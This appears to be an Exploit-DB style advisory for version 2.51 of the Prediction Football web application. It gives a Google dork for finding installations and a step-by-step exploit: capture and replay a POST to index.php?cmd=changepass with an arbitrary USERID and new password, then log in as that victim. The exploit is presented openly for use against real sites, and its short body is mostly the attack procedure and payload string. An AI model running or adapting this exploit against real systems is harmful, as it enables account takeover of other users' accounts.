# Exploit Title: [title] # Google Dork: [if relevant] intext:"Prediction football 2.51" # Date: 08/08/2011 # Author: Smith Falcon # Software Link: http://www.predictionfootball.com/download/download.html # Version: 2.51 # Tested on: Linux First create a username and go to Account Profile The POST variable in index.php?cmd=changepass is vulnerable to CSRF Grab Header Information with HTTP Live headers and replay the POST VARIABLE &OLDPWD=anything&USERID=[id of user u want pwd changed]&PWD1=[newpass]&PWD2=[newpass]&ChangePwd=Change+Password REPLAY with new password of the userid and logout! Now you can login with that desired user and password!
Related ExploitsTrying to match OSVDBs (1): 74536
Other Possible E-DB Search Terms: Prediction Football 2.51, Prediction Football
|2008-04-08||Prediction Football 1.x - 'matchid' Parameter SQL Injection||0in|